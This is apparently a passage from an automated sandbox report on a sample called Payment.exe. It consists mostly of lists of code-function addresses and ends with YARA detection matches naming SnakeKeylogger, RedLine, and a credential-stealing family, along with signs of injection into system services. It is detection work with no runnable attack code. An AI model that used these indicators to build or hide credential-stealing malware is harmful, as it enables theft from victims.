                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C2DF08_2_071C2DF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C44E88_2_071C44E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C68E88_2_071C68E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CB5E88_2_071CB5E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C80E88_2_071C80E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071CCDE88_2_071CCDE8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C16E98_2_071C16E9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_071C2DE08_2_071C2DE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072671688_2_07267168
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726EB508_2_0726EB50
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072609E08_2_072609E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726E8308_2_0726E830
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072600408_2_07260040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07269D288_2_07269D28
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726CF288_2_0726CF28
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072605008_2_07260500
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726B3088_2_0726B308
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072681088_2_07268108
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072605108_2_07260510
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726E5108_2_0726E510
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726A3688_2_0726A368
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726D5688_2_0726D568
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072687488_2_07268748
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726B9488_2_0726B948
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726A9A88_2_0726A9A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072677A88_2_072677A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726DBB08_2_0726DBB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07268D888_2_07268D88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726BF888_2_0726BF88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726F1908_2_0726F190
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726AFE88_2_0726AFE8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07267DE88_2_07267DE8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726E1F08_2_0726E1F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072693C88_2_072693C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726C5C88_2_0726C5C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726F7D08_2_0726F7D0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072609D08_2_072609D0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07267DD88_2_07267DD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726B6288_2_0726B628
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072684288_2_07268428
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072600068_2_07260006
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07269A088_2_07269A08
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726CC088_2_0726CC08
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726BC688_2_0726BC68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07268A688_2_07268A68
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726EE708_2_0726EE70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726D8788_2_0726D878
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726D2488_2_0726D248
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726A0488_2_0726A048
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072690A88_2_072690A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726C2A88_2_0726C2A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726F4B08_2_0726F4B0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726A6888_2_0726A688
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072674888_2_07267488
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726D8888_2_0726D888
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072634988_2_07263498
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_072696E88_2_072696E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726C8E88_2_0726C8E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726FAF08_2_0726FAF0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726ACC88_2_0726ACC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07267AC88_2_07267AC8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0726DED08_2_0726DED0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073161288_2_07316128
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731C7788_2_0731C778
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731B5388_2_0731B538
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073185208_2_07318520
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07312F208_2_07312F20
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731F1208_2_0731F120
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731F1108_2_0731F110
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731AB188_2_0731AB18
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731611A8_2_0731611A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073113008_2_07311300
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073145008_2_07314500
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073103608_2_07310360
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073135608_2_07313560
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073199608_2_07319960
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731C7678_2_0731C767
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073173688_2_07317368
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731BF588_2_0731BF58
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07314B408_2_07314B40
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073119408_2_07311940
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731FBB08_2_0731FBB0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073157B88_2_073157B8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731ADA18_2_0731ADA1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07313BA08_2_07313BA0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073109A08_2_073109A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731FBA28_2_0731FBA2
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07311F808_2_07311F80
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073151808_2_07315180
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731A3808_2_0731A380
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07317D898_2_07317D89
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073175F08_2_073175F0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07315DF88_2_07315DF8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07310FE08_2_07310FE0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073141E08_2_073141E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731C1E08_2_0731C1E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07319BE98_2_07319BE9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073125C08_2_073125C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731B7C08_2_0731B7C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073157C88_2_073157C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073191C88_2_073191C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073132308_2_07313230
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07318A308_2_07318A30
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073116208_2_07311620
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073148208_2_07314820
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731B0298_2_0731B029
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073180108_2_07318010
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07312C008_2_07312C00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073100078_2_07310007
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07315E088_2_07315E08
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07319E708_2_07319E70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07311C608_2_07311C60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07314E608_2_07314E60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731C4698_2_0731C469
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073194508_2_07319450
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073132408_2_07313240
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073100408_2_07310040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731BA498_2_0731BA49
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731B2B08_2_0731B2B0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07318CBA8_2_07318CBA
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073122A08_2_073122A0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731DEA88_2_0731DEA8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073154A88_2_073154A8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731A8908_2_0731A890
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731DE988_2_0731DE98
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731549A8_2_0731549A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731829A8_2_0731829A
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073106808_2_07310680
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073138808_2_07313880
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731A0F88_2_0731A0F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073128E08_2_073128E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07315AE88_2_07315AE8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0731BCD08_2_0731BCD0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07315AD88_2_07315AD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073196DA8_2_073196DA
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07313EC08_2_07313EC0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07310CC08_2_07310CC0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073166C08_2_073166C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07334F888_2_07334F88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07339B888_2_07339B88
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07331AA08_2_07331AA0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073321F88_2_073321F8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073394B88_2_073394B8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073328E08_2_073328E0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733F3288_2_0733F328
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733F3178_2_0733F317
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07338B008_2_07338B00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733F7728_2_0733F772
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07334F798_2_07334F79
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733F7808_2_0733F780
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733FBD88_2_0733FBD8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733C3C18_2_0733C3C1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733E6208_2_0733E620
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733E6108_2_0733E610
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073302738_2_07330273
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733EA788_2_0733EA78
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733EA698_2_0733EA69
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07331A908_2_07331A90
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733EED08_2_0733EED0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733EEC08_2_0733EEC0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D9188_2_0733D918
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D9088_2_0733D908
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07330D708_2_07330D70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733DD708_2_0733DD70
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_07330D608_2_07330D60
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733DD5F8_2_0733DD5F
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733E1BA8_2_0733E1BA
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073321E88_2_073321E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733E1C88_2_0733E1C8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733CC108_2_0733CC10
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733CC008_2_0733CC00
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D0688_2_0733D068
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D0598_2_0733D059
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D4B08_2_0733D4B0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073328D38_2_073328D3
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_0733D4C08_2_0733D4C0
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C07288_2_073C0728
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C23008_2_073C2300
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C00408_2_073C0040
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C0E488_2_073C0E48
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C29E88_2_073C29E8
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C15308_2_073C1530
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C1C188_2_073C1C18
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C07188_2_073C0718
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C22F18_2_073C22F1
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C00068_2_073C0006
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C0E388_2_073C0E38
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C29D98_2_073C29D9
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C15228_2_073C1522
                  Source: C:\Users\user\Desktop\Payment.exeCode function: 8_2_073C1C098_2_073C1C09
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_0055A81014_2_0055A810
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_00537C0014_2_00537C00
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_00562D4014_2_00562D40
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_005379F014_2_005379F0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_0055EEB014_2_0055EEB0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_005592A014_2_005592A0
                  Source: C:\Windows\System32\AppVClient.exeCode function: 14_2_005593B014_2_005593B0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_012CD40418_2_012CD404
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_030C000618_2_030C0006
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_030C004018_2_030C0040
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_032B8F2A18_2_032B8F2A
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_032BDE5018_2_032BDE50
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_032B80C818_2_032B80C8
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_032B80D818_2_032B80D8
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B93B3818_2_08B93B38
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B9E8B018_2_08B9E8B0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B96B3018_2_08B96B30
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B93B2A18_2_08B93B2A
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B98FF018_2_08B98FF0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B96F6818_2_08B96F68
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B973A018_2_08B973A0
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B9739118_2_08B97391
                  Source: C:\Users\user\AppData\Roaming\jwBqGZseW.exeCode function: 18_2_08B9864018_2_08B98640
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C07C0019_2_00C07C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C2A81019_2_00C2A810
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C079F019_2_00C079F0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C32D4019_2_00C32D40
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C292A019_2_00C292A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C2EEB019_2_00C2EEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00C293B019_2_00C293B0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00BBA81021_2_00BBA810
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B97C0021_2_00B97C00
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B979F021_2_00B979F0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00BC2D4021_2_00BC2D40
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00BBEEB021_2_00BBEEB0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00BB92A021_2_00BB92A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00BB93B021_2_00BB93B0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_007551EE23_2_007551EE
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_007939A323_2_007939A3
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00756EAF23_2_00756EAF
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_0078598023_2_00785980
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_0078D58023_2_0078D580
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_0078C7F023_2_0078C7F0
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_00757F8023_2_00757F80
                  Source: C:\Windows\SysWOW64\perfhost.exeCode function: 23_2_0078378023_2_00783780
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0074A81027_2_0074A810
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00727C0027_2_00727C00
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00752D4027_2_00752D40
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_007279F027_2_007279F0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0074EEB027_2_0074EEB0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_007492A027_2_007492A0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_007493B027_2_007493B0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_007FA81028_2_007FA810
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_007D7C0028_2_007D7C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Load Driver
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: Security
                  Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 0040E1D8 appears 42 times
                  Source: updater.exe0.8.drStatic PE information: Resource name: RT_STRING type: CLIPPER COFF executable (VAX #) not stripped - version 71
                  Source: elevation_service.exe0.8.drStatic PE information: Number of sections : 12 > 10
                  Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePoBx vs Payment.exe
                  Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameiy vs Payment.exe
                  Source: Payment.exe, 00000000.00000002.909679657.0000000007168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcVJ.exe@ vs Payment.exe
                  Source: Payment.exe, 00000000.00000002.910163937.0000000008FA1000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Payment.exe
                  Source: Payment.exeBinary or memory string: OriginalFilename vs Payment.exe
                  Source: Payment.exe, 00000008.00000002.2103283935.0000000000436000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Payment.exe
                  Source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Payment.exe
                  Source: Payment.exe, 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Payment.exe
                  Source: Payment.exe, 00000008.00000002.2146723496.0000000003898000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Payment.exe
                  Source: Payment.exe, 00000008.00000002.2121846551.00000000010F7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Payment.exe
                  Source: Payment.exeBinary or memory string: OriginalFilenamevcVJ.exe@ vs Payment.exe
                  Source: unknownDriver loaded: C:\Windows\System32\drivers\AppVStrm.sys
                  Source: Payment.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 18.2.jwBqGZseW.exe.43414a8.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 18.2.jwBqGZseW.exe.43414a8.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 18.2.jwBqGZseW.exe.44e24c8.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
